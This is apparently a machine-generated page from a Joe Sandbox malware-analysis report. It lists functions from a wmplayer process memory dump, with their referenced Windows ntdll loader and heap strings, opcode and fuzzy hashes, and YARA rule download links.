Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
Instruction ID: 45c601125b1fa07ce6d997f46f7f3db30cdc3a0317b7434775ff1570931b17f7
Opcode Fuzzy Hash: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
Instruction Fuzzy Hash: 4942FD752083859FC715EFA8C884A2AFBE5FF85208F0849EDE595CB381D734E985CB52

Function 0384B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 038984D0
LdrpPreprocessDllName, xrefs: 03898403, 038984D7
API set, xrefs: 038983F4, 038983F9
SxS, xrefs: 038983ED
minkernel\ntdll\ldrutil.c, xrefs: 0389840D, 038984E1
DLL %wZ was redirected to %wZ by %s, xrefs: 038983FC

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
Instruction ID: 300141ed59f016e043bd6a0ec2ccc6de703499d8a2f47aa16fcbb449c78f9a34
Opcode Fuzzy Hash: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
Instruction Fuzzy Hash: 52C10831A0025DABDF25CBF9C88077EB7A5AF85314F1840E9E885DFA81E7B4D944C391

Function 038663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 038A40D8
Delaying execution failed with status 0x%08lx, xrefs: 038A4258
_LdrpInitialize, xrefs: 038A40DF, 038A4141, 038A4205, 038A425F
minkernel\ntdll\ldrinit.c, xrefs: 038A40E9, 038A414B, 038A420F, 038A4269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 038A41FE
Process initialization failed with status 0x%08lx, xrefs: 038A413A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
Instruction ID: 6311854383b9c96117011b5153a5246d3501a1668c3649e5bb617a90724edfb3
Opcode Fuzzy Hash: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
Instruction Fuzzy Hash: 84913731A04B549BEB34EFEDD844BAEB7A4EB41714F1805E8D410EF781E7B49801C791

Function 038551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Allowed, xrefs: 0385527B
WindowsExcludedProcs, xrefs: 0385522A
Kernel-MUI-Language-Disallowed, xrefs: 03855352
Kernel-MUI-Language-SKU, xrefs: 0385542B
Kernel-MUI-Number-Allowed, xrefs: 03855247

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
Instruction ID: c8881468731236dab3c0f7c878631efc9c9966eac8436dcd325f7ad1b4be30a4
Opcode Fuzzy Hash: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
Instruction Fuzzy Hash: 87F13C76D00218EFCF15DFE8C980AEEBBB9EF49650F15409AE905EB250D7749E01CBA0

Function 0385D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

LdrShutdownProcess, xrefs: 0389F2CE
$, xrefs: 0385D900
$, xrefs: 0385D86D
minkernel\ntdll\ldrinit.c, xrefs: 0389F2D8
Process 0x%p (%wZ) exiting, xrefs: 0389F2C7

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
Instruction ID: c1fb34290ba8be63d16ad3ec2f68057befe603d2b51c2f046e858c68c58cafc7
Opcode Fuzzy Hash: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
Instruction Fuzzy Hash: 7F51DD75A04749DFDB24EFE8C48479DBBB1BB48318F284499EC01EF291D774A889CB81

Function 038470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03847C6D, 03848670
HEAP: , xrefs: 03847C7C, 0384867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03847C96, 03848696

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
Instruction ID: 8b815e310aeae3f98791fa2a65f158279ea05b7e4830fb72ddc1d593a91d7a9c
Opcode Fuzzy Hash: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
Instruction Fuzzy Hash: FB139C70A00659DFDB25CFA8C4807A9FBF1BF49304F1881E9E859EBB81D735A945CB90

Function 03841070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03895877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 0389588F
HEAP: , xrefs: 03895884
@, xrefs: 03895A53

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 2994545307-3570731704
Opcode ID: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
Instruction ID: c80a15babd73741442a89e34e84de45f38a01be09ed50ebd0d4d585bcba70acc
Opcode Fuzzy Hash: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
Instruction Fuzzy Hash: 7E924975A0022CCFEB25CFA8C844BA9B7B5BF45314F1981EAD949EB640D7349E80CF51

Function 0383A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0383A3EF
6, xrefs: 0383A3F7
LdrResFallbackLangList Exit, xrefs: 0383A3FF
8, xrefs: 0383A3E7

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
Instruction ID: 7c3eaf74c240a45e1a305e0bd1cac37b988ba894ecbec2a4ab80284584cd7aee
Opcode Fuzzy Hash: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
Instruction Fuzzy Hash: 62C16D7410838A9FD719DF98C044B6AB7E4BF85708F0849AAF8D5CB350E739CA45CB92

Function 038E11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 038E123D, 038E12B7
HEAP: , xrefs: 038E124A, 038E125D, 038E125F, 038E12C4
This is located in the %s field of the heap header., xrefs: 038E12D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 038E1261

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
Instruction ID: 95e4e9b07188df4c79b6148d4d11971e06b4c70455c610505b289876ffd5cd80
Opcode Fuzzy Hash: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
Instruction Fuzzy Hash: 4D310176200214EFC752DBE8CC89F6AB7E8EF06664F1800D5F451CB291E670EC80CA66

Function 03829148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0388BAA0, 0388BADD
HEAP: , xrefs: 0388BAAD, 0388BAEA
VirtualQuery Failed 0x%p %x, xrefs: 0388BAF7
VirtualProtect Failed 0x%p %x, xrefs: 0388BABA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
Instruction ID: bbec31347abfab640ce93706d2b09145f0dfee5472da1e61b69f1d324131d037
Opcode Fuzzy Hash: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
Instruction Fuzzy Hash: F0318336601214EFCB12EBDACC85F9EBBB9EF45620F1440D5E814EB291D774ED80CA61

Function 0382A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0388C2E6
UseFilter, xrefs: 0382A1C1
\??\, xrefs: 0388C1E4

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
Instruction ID: 7ba8e65e027325a223891a186ec80d599dbff85d2649cfe744fb19d6bf7c83cb
Opcode Fuzzy Hash: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
Instruction Fuzzy Hash: 9BA15B759116299BDB21EFA4CC88BAAF7B8EF44700F1401EAE909EB250D7359EC5CF50

Function 0386909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03869148
&, xrefs: 038A5CF8
%, xrefs: 038A5D3F

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
Instruction ID: fff45813672bb968ea57cd1d64587496fe12ff61f9441b6f4fcc5906ddb5da98
Opcode Fuzzy Hash: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
Instruction Fuzzy Hash: FD71C0745087059FD710DFA8C580A2BFBE9BFC5618F24499DE4AACB291D730D905CB93

Function 0382F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0388E6A6
HEAP: , xrefs: 0388E6B3
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0388E6C6

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
Instruction ID: 2cfd87f890987b1ffd98440ea9f76d05b89efea49445ccce6fbe6d03000fb375
Opcode Fuzzy Hash: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
Instruction Fuzzy Hash: 0D51C335604758EFD722EBE8C844B6AFBF8AF05304F0800E4EA51DB692D774E950CB11

Function 038EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 038EC1C5
PreferredUILanguages, xrefs: 038EC212
@, xrefs: 038EC1F1

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
Instruction ID: ab3b941811eed4007a2a3b55c844c779ab68e1c44d87d69921d2c224a31cd37b
Opcode Fuzzy Hash: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
Instruction Fuzzy Hash: EC418076E00209EFDF11DAE8C881FEEBBBDAB05704F1440AAE915F7290D7749A44CB91

Function 038C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 038C4172
LdrpResValidateFilePath Enter, xrefs: 038C4160
@, xrefs: 038C4225

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
Instruction ID: 45b8a968ef6840c617b8e779d57ab69def026b59df24218279c6adad6e342058
Opcode Fuzzy Hash: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
Instruction Fuzzy Hash: 3641D0759103888BEB22DBEAC850BADB7B8EF55344F1804DED941EF781DA75C941CB11

Function 038633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 038A29FE
Actx , xrefs: 038633AC
RtlCreateActivationContext, xrefs: 038A29F9

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
Instruction ID: b1c0e2ab712122ac0b7498834d98fbab40289ac221d53eb43c60685334179a20
Opcode Fuzzy Hash: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
Instruction Fuzzy Hash: CA3126362007059FEB26DED8C880F96B7A4BB44710F1944A9ED05DF291C7B0E941C790

Function 03871270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0387127B
@, xrefs: 038712A5
BuildLabEx, xrefs: 0387130F

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 4635ca6531ac7e08b8900ba23c51f3a2025f30fc1f2abe20ebcc425b6ea0a284
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 6231AF7690061CABDB11EFE9CC48EAEBBBEEB85710F0044A5E914EB560D734DA05CB61

Function 038B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 038B2104
LdrpInitializationFailure, xrefs: 038B20FA
Process initialization failed with status 0x%08lx, xrefs: 038B20F3

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
Instruction ID: c0e0ff6b640596ca071a6e31100b739d2060ad1d58aa65ab677bcf461b06411c
Opcode Fuzzy Hash: fe5e8c9292fe8e60b91f3c5554723a1a0d8a52f79b48a25dca693cb524d99ce5
Instruction Fuzzy Hash: 75F0FF74640708ABEA20E68C8C42F9A776CEB40A04F1408D4F600EB386D2A4B9108A91

Function 038403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03894D8A

Strings

#%u, xrefs: 03894D82

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
Instruction ID: 8314ba0e6bb7f8b0a8d37bb8876a8c3b8fb16f967e1b51cb8753c3514fbc80f7
Opcode Fuzzy Hash: d4e27bf87f0dc59c4d1155fa447bb575e49033d29f2f344769eacb4db14f395a
Instruction Fuzzy Hash: 09713CB5A0024A9FDB05DFD9D990BAEB7F8EF08704F1940A5E905EB251E734EE01CB61

Function 038452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 03845445
@, xrefs: 038455A3

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
Instruction ID: 8882e674f703a811e7dd5a92fb50e3291589e51cf8f4455b793f54fe480b272f
Opcode Fuzzy Hash: da531006d767e694d1c114e6b32df3299d9b31bf96c5e4403ad8826cf7f631ac
Instruction Fuzzy Hash: D332BB745083198BDB24CF98C480B3EB7E1EF86754F1849AEF885DBA90E734D944CB52

Function 038FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 038FA44B
`, xrefs: 038FA551

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 2d59ca1ad93ee3e0910cc56d7a4bbaf1edec67c4855c9e7b8cfb1a9e05eca2f2
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: AEC1B0312043459FD728CFA8C841B6BFBE5AF84328F184AADF699CA290D779D505CF52

Function 0383A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0383A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0383A309

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
